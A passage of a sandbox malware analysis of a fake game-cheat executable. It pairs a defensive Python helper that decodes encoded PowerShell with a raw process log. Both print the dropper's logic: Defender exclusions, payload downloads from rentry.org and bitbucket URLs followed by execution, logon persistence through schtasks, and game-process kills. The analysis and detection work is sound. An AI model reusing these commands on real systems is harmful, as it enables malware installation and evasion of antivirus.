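The encoded launcher above is worth decoding mechanically rather than by eye: `-EncodedCommand` is base64 over UTF-16LE (not UTF-8), the `<#xyz#>` block comments are junk inserted to break string signatures, and the indicators that matter (the Defender exclusions, the rentry.org URL that serves the payload list, the download-then-Start-Process loop) only become visible once both layers are stripped. The Python triage helper below is an added example, not part of the Joe Sandbox report or of the sample's code. It builds its own encoded sample from a cut-down copy of the decoded script (the report's encoded string is not reused), then runs a small rule set over command lines quoted from this section (the Add-MpPreference call, the schtasks onlogon task pointing at a .vbs in AppData, the taskkill, the hosts-file findstr). The tag names and regexes are this example's own, not Joe Sandbox signature names.

```python
"""Triage helper for sandbox process-creation lines (added example, not report code)."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: a cut-down copy of the dropper decoded in the report,
# keeping its structure (junk <#..#> comments, Defender exclusion, payload
# list fetched from a paste site, download-then-run loop). It is never run.
SAMPLE_SCRIPT = (
    "<#blw#>Add-MpPreference <#ujf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force;"
    "$wc = (New-Object System.Net.WebClient);"
    "$lnk = $wc.DownloadString('https://rentry.org/pancek61111111111111/raw')"
    ".Split([string[]]\"`r`n\", [StringSplitOptions]::None);"
    "$fn = [System.IO.Path]::GetRandomFileName();"
    "for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#mct#> "
    "(Join-Path -Path $env:AppData -ChildPath ($fn + $i.ToString() + '.exe'))) };"
    "for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath "
    "(Join-Path -Path $env:AppData -ChildPath ($fn + $i.ToString() + '.exe')) }"
)


def encode_command(script: str) -> str:
    """Build a -EncodedCommand value the way powershell.exe expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed command lines: the first is built here, the rest are quoted
# from the process-creation entries in this section of the report.
SAMPLE_LINES = [
    'powershell.exe -EncodedCommand "' + encode_command(SAMPLE_SCRIPT) + '"',
    r'powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"',
    r'schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f',
    r'taskkill /f /im cs2.exe',
    r'findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"',
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen most often. A base64-looking payload of some length is required.
ENCODED_RE = re.compile(r'-(?:e|ec|en|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]{16,})', re.I)
COMMENT_RE = re.compile(r"<#.*?#>", re.S)        # PowerShell block comments used as junk
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")

# Indicator rules, applied to the decoded script when there is one, otherwise to
# the raw command line. Tag names are this example's own.
RULES = [
    ("defender_exclusion", re.compile(r"\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Extension|Process)", re.I)),
    ("remote_config_fetch", re.compile(r"\.DownloadString\(", re.I)),
    ("download_to_disk", re.compile(r"\.DownloadFile\(", re.I)),
    ("execute_dropped", re.compile(r"\bStart-Process\b", re.I)),
    ("logon_persistence", re.compile(r"\bschtasks\b.*?/create\b.*?/sc\s+onlogon", re.I)),
    ("script_in_appdata", re.compile(r"AppData\\.*?\.(?:vbs|bat|ps1|js)\b", re.I)),
    ("force_kill", re.compile(r"\btaskkill\b.*?/f\b", re.I)),
    ("hosts_file_probe", re.compile(r"drivers\\etc\\hosts", re.I)),
]


@dataclass
class Finding:
    cmdline: str
    tags: List[str] = field(default_factory=list)
    decoded: Optional[str] = None
    urls: List[str] = field(default_factory=list)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def deobfuscate(script: str) -> str:
    """Strip junk block comments and squeeze whitespace so the rules see plain tokens."""
    return re.sub(r"\s+", " ", COMMENT_RE.sub("", script)).strip()


def triage_line(cmdline: str) -> Finding:
    """Decode if needed, then tag the line and pull out any URLs it contacts."""
    f = Finding(cmdline=cmdline)
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        f.decoded = deobfuscate(decoded)
        f.tags.append("encoded_command")
    text = f.decoded if f.decoded is not None else cmdline
    f.urls = URL_RE.findall(text)
    f.tags.extend(tag for tag, rx in RULES if rx.search(text))
    return f


def triage(lines: List[str]) -> List[Finding]:
    return [triage_line(line) for line in lines]


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(", ".join(f.tags) or "-", f.urls, f.cmdline[:60])
```

Two design points. The rules run on the decoded, comment-stripped text, so a signature keyed on `Add-MpPreference` fires whether the call arrives in clear on the command line (as in the cmd.exe chains above) or buried behind base64 and junk comments (as in the launcher); matching only the raw command line would miss the second case entirely. And because powershell.exe accepts any unambiguous prefix of `-EncodedCommand`, a production detection should decode on a loose match and key on the decoded content rather than on one spelling of the switch.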
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Process created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 1251
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "dota2.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im dota2.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "cs2.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im cs2.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "RustClient.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im RustClient.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "GTA5.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im GTA5.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "RustClient.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "GTA5.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "cs2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im dota2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im cs2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im RustClient.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im GTA5.exe
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiabab3acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajageadabyacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccarqbyahiabwbyacaaiwa4adeaoqa6acaaqwbhag4abgbvahqaiabzahqayqbyahqaiabkahuazqagahqabwagag0aaqbzahmaaqbuagcaiabkaguacablag4azablag4aywbpaguacwasacaacabsaguayqbzaguaiabpag4acwb0ageababsacaayqbsagwaiab0aggazqagagqazqbwaguabgbkaguabgbjagkazqbzacaacgblaheadqbpahiazqbkac4ajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajagiacqbzacmapga7aciaowa8acmazqbtahyaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwb1agoazgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwb1aheabqajad4aiaataeyabwbyagmazqagadwaiwb3ahcaeaajad4aowakahcaywagad0aiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqa7acqababuagsaiaa9acaajab3agmalgbeag8adwbuagwabwbhagqauwb0ahiaaqbuagcakaanaggadab0ahaacwa6ac8alwbyaguabgb0ahiaeqauag8acgbnac8acabhag4aywblagsangaxadeamqaxadeamqaxadeamqaxadeamqaxac8acgbhahcajwapac4auwbwagwaaqb0acgawwbzahqacgbpag4azwbbaf0axqaiagaacgbgag4aigasacaawwbtahqacgbpag4azwbtahaababpahqatwbwahqaaqbvag4acwbdadoaogboag8abgblackaowagacqazgbuacaapqagafsauwb5ahmadablag0algbjae8algbqageadaboaf0aoga6aecazqb0afiayqbuagqabwbtaeyaaqbsaguatgbhag0azqaoackaowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqababuagsalgbmaguabgbnahqaaaa7acaajabpacsakwapacaaewagacqadwbjac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakagwabgbrafsajabpa
f0alaagadwaiwbtagmadaajad4aiaaoaeoabwbpag4alqbqageadaboacaapaajagoabqbpacmapgagac0auabhahqaaaagacqazqbuahyaogbbahaacabeageadabhacaapaajagkazwbuacmapgagac0aqwboagkababkafaayqb0aggaiaaoacqazgbuacaakwagacqaaqauafqabwbtahqacgbpag4azwaoackaiaaracaajwauaguaeablaccakqapackaiab9adwaiwb2agkaeaajad4aowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqababuagsalgbmaguabgbnahqaaaa7acaajabpacsakwapacaaewagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagadwaiwb3aguadaajad4aiaaoaeoabwbpag4alqbqageadaboacaalqbqageadaboacaajablag4adga6aeeacabwaeqayqb0ageaiaa8acmadgb2ahgaiwa+acaalqbdaggaaqbsagqauabhahqaaaagacgajabmag4aiaaracaajabpac4avabvafmadabyagkabgbnacgakqagacsaiaanac4azqb4aguajwapackaiab9acaapaajahgababpacmapga="
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#atr#>[system.windows.forms.messagebox]::show('error #819: cannot start due to missing dependencies, please install all the dependencies required.','','ok','error')<#bqs#>;
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\appdata" & powershell.exe -inputformat none -outputformat none -noninteractive -command "add-mppreference -exclusionpath %userprofile%\local" & powershell.exe -command "set-mppreference -exclusionextension '.exe','.py'""
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000261E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000261E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE8880 cpuid 14_2_00007FF741BE8880
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GetLocaleInfoA,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,31_2_00007FFB01998660
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GetLocaleInfoA,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,42_2_00007FFB1C5A8660
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: InitCommonControlsEx,RegisterClassW,GetKeyboardLayout,GetLocaleInfoW,TranslateCharsetInfo,42_2_00007FFB1C5C6890
                        Source: C:\Users\user\Desktop\RedEngine.exeQueries volume information: C:\Users\user\Desktop\RedEngine.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeQueries volume information: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl8 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl8\8.4 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl8 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl8 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl8\8.5 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl8 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\encoding VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\encoding VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\encoding VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\encoding VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\encoding VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\encoding VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\encoding VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
